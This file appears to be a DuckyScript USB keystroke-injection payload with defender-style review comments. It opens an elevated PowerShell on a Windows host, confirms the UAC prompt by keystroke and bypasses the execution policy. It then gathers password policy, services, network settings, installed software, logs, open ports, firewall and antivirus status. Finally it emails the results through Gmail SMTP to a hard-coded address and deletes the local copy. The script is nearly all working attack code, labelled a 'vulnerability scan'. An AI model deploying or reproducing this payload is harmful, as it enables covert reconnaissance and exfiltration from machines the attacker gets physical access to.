REM script in progress
REM Purpose: USB keystroke-injection (DuckyScript) payload. It opens PowerShell through the
REM Start menu with the run-as-administrator entry, types a script block that writes host
REM configuration to results.txt, sends that text over SMTP to a fixed mailbox, and then
REM deletes results.txt.
REM Review notes (defender view):
REM  - Every command is typed into an interactive console. By default PSReadLine saves typed
REM    lines to its history file, and script block logging (where enabled) records them too.
REM  - Synchronisation is by fixed DELAYs only; nothing checks that the expected window has focus.
REM  - The collected data leaves the host to an external mail service; see the notes at the
REM    Send-EmailAndCleanup call.
DELAY 5000
REM Open Start Menu
CONTROL ESCAPE
DELAY 3000
STRING powershell
DELAY 3000
REM Navigate to the context menu to run PowerShell as an administrator
REM Which entry these arrow keys land on depends on the Start menu layout; not verifiable from here.
DOWNARROW
DELAY 1500
RIGHTARROW
DELAY 1500
DOWNARROW
DELAY 1500
DOWNARROW
DELAY 1500
ENTER
DELAY 5000
REM ALT Y presumably answers the UAC consent prompt with Yes - confirm.
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
REM -Scope Process applies the change to this PowerShell session only.
DELAY 500
STRING Set-ExecutionPolicy Bypass -Scope Process -Force
DELAY 500
ENTER
DELAY 500
REM Create the PowerShell script in memory and execute it
REM The mailbox password is typed as a plain-text literal ('YourAppSpecificPassword' is a
REM placeholder). Whatever value replaces it is stored in the payload file and is exposed
REM to the same history and logging as the other typed commands.
DELAY 500
STRING $securePassword = ConvertTo-SecureString 'YourAppSpecificPassword' -AsPlainText -Force
DELAY 500
ENTER
DELAY 500
STRING $credential = New-Object System.Management.Automation.PSCredential ('igrowsc@gmail.com', $securePassword)
DELAY 500
ENTER
DELAY 500
REM From here to the closing brace the keystrokes only define $script; nothing inside runs
REM until the Invoke-Command line at the end.
STRING $script = {
DELAY 500
ENTER
DELAY 500
REM Check-PasswordPolicy: prints the output of net accounts.
STRING function Check-PasswordPolicy {
DELAY 500
ENTER
DELAY 500
STRING net accounts
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Audit-Services: lists every service with name, display name, status and start type.
STRING function Audit-Services {
DELAY 500
ENTER
DELAY 500
STRING Get-Service | Select-Object Name, DisplayName, Status, StartType
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Check-NetworkSettings: prints the IP configuration of the host.
STRING function Check-NetworkSettings {
DELAY 500
ENTER
DELAY 500
STRING Get-NetIPConfiguration
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Check-SoftwareVulnerabilities: despite the name it only inventories installed software.
REM Only the Wow6432Node Uninstall key is read, so entries under the non-Wow6432Node
REM Uninstall key are not listed.
STRING function Check-SoftwareVulnerabilities {
DELAY 500
ENTER
DELAY 500
STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Check-CVE: queries the NVD keyword search for one product name and version and prints
REM "ID - description" per result, or a "No CVEs found" line.
REM NOTE(review): product name and version are placed in the URL without encoding.
REM NOTE(review): the NVD 1.0 endpoint has been retired in favour of the 2.0 API - confirm
REM this request still returns data.
STRING function Check-CVE {
DELAY 500
ENTER
DELAY 500
STRING param (
DELAY 500
ENTER
DELAY 500
STRING [string]$productName,
DELAY 500
ENTER
DELAY 500
STRING [string]$version
DELAY 500
ENTER
DELAY 500
STRING )
DELAY 500
ENTER
DELAY 500
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productName+$version"
DELAY 500
ENTER
DELAY 500
REM Five-second pause before every request; presumably for API rate limiting.
STRING Start-Sleep -Seconds 5
DELAY 500
ENTER
DELAY 500
STRING $response = Invoke-RestMethod -Uri $uri -Method Get
DELAY 500
ENTER
DELAY 500
STRING if ($response.totalResults -gt 0) {
DELAY 500
ENTER
DELAY 500
STRING foreach ($cve in $response.result.CVE_Items) {
DELAY 500
ENTER
DELAY 500
STRING "$($cve.cve.CVE_data_meta.ID) - $($cve.cve.description.description_data[0].value)"
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
STRING } else {
DELAY 500
ENTER
DELAY 500
STRING "No CVEs found for $productName $version"
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Analyze-Logs: returns the 100 newest System event log entries; no filtering or analysis.
STRING function Analyze-Logs {
DELAY 500
ENTER
DELAY 500
STRING Get-EventLog -LogName System -Newest 100
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Check-OpenPorts: prints all connections and listening ports in numeric form.
STRING function Check-OpenPorts {
DELAY 500
ENTER
DELAY 500
STRING netstat -an
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM NOTE(review): Get-WindowsUpdateLog builds a WindowsUpdate.log file from trace data; it
REM does not itself report missing updates - confirm this matches the function's intent.
STRING function Check-MissingUpdates {
DELAY 500
ENTER
DELAY 500
STRING Get-WindowsUpdateLog
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Check-FirewallStatus: prints the Windows Firewall settings for all profiles.
STRING function Check-FirewallStatus {
DELAY 500
ENTER
DELAY 500
STRING netsh advfirewall show allprofiles
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Check-SMBv1Status: reports the state of the SMB1Protocol optional feature.
STRING function Check-SMBv1Status {
DELAY 500
ENTER
DELAY 500
STRING Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Check-AntivirusStatus: prints the Microsoft Defender status object.
STRING function Check-AntivirusStatus {
DELAY 500
ENTER
DELAY 500
STRING Get-MpComputerStatus
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Send-EmailAndCleanup: authenticates to the SMTP server with the supplied credential over
REM TLS, sends one message, then deletes the file at attachmentPath.
REM The file is not attached: its raw content is appended to the message body.
STRING function Send-EmailAndCleanup {
DELAY 500
ENTER
DELAY 500
STRING param (
DELAY 500
ENTER
DELAY 500
STRING [string]$smtpServer,
DELAY 500
ENTER
DELAY 500
STRING [string]$smtpFrom,
DELAY 500
ENTER
DELAY 500
STRING [string]$smtpTo,
DELAY 500
ENTER
DELAY 500
STRING [string]$messageSubject,
DELAY 500
ENTER
DELAY 500
STRING [string]$messageBody,
DELAY 500
ENTER
DELAY 500
STRING [string]$attachmentPath,
DELAY 500
ENTER
DELAY 500
STRING [System.Management.Automation.PSCredential]$credential
DELAY 500
ENTER
DELAY 500
STRING )
DELAY 500
ENTER
DELAY 500
STRING $smtp = New-Object Net.Mail.SmtpClient($smtpServer)
DELAY 500
ENTER
DELAY 500
STRING $smtp.Credentials = $credential
DELAY 500
ENTER
DELAY 500
STRING $smtp.EnableSsl = $true
DELAY 500
ENTER
DELAY 500
STRING $smtp.Send($smtpFrom, $smtpTo, $messageSubject, $messageBody + (Get-Content -Path $attachmentPath -Raw))
DELAY 500
ENTER
DELAY 500
REM Removes the local copy of the collected output once the message has been handed to SMTP.
STRING Remove-Item -Path $attachmentPath
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Collection phase: the first redirect (>) creates or truncates results.txt and the rest
REM append. The path is relative, so the file lands in the shell's current directory.
STRING Check-PasswordPolicy > results.txt
DELAY 500
ENTER
DELAY 500
STRING Audit-Services >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Check-NetworkSettings >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Check-SoftwareVulnerabilities >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Analyze-Logs >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Check-OpenPorts >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Check-MissingUpdates >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Check-FirewallStatus >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Check-SMBv1Status >> results.txt
DELAY 500
ENTER
DELAY 500
STRING Check-AntivirusStatus >> results.txt
DELAY 500
ENTER
DELAY 500
REM One NVD request per Uninstall entry: each product name and version is sent to an
REM external service, with the five-second pause from Check-CVE before each request.
STRING Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | ForEach-Object { Check-CVE -productName $_.DisplayName -version $_.DisplayVersion } >> results.txt
DELAY 500
ENTER
DELAY 500
REM Egress: password policy, services, IP configuration, software inventory, System events,
REM open ports, firewall, SMBv1 and Defender status are mailed to an external Gmail mailbox.
REM Sender and recipient are the same hard-coded address. Outbound SMTP from a workstation
REM to a public mail provider is an observable point for monitoring or blocking.
STRING Send-EmailAndCleanup -smtpServer "smtp.gmail.com" -smtpFrom "igrowsc@gmail.com" -smtpTo "igrowsc@gmail.com" -messageSubject "Vulnerability Scan Results" -messageBody "Attached are the results of the vulnerability scan." -attachmentPath "results.txt" -credential $credential
DELAY 500
ENTER
DELAY 500
REM NOTE(review): the block is typed into a console rather than run from a file, so
REM $MyInvocation.MyCommand.Path is presumably empty here - confirm what this line is meant to delete.
STRING Remove-Item -Path $MyInvocation.MyCommand.Path
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 500
REM Runs the script block defined above in the current local session.
STRING Invoke-Command -ScriptBlock $script
DELAY 500
ENTER
REM Final 20 s wait; the script does not check whether the typed commands completed.
DELAY 20000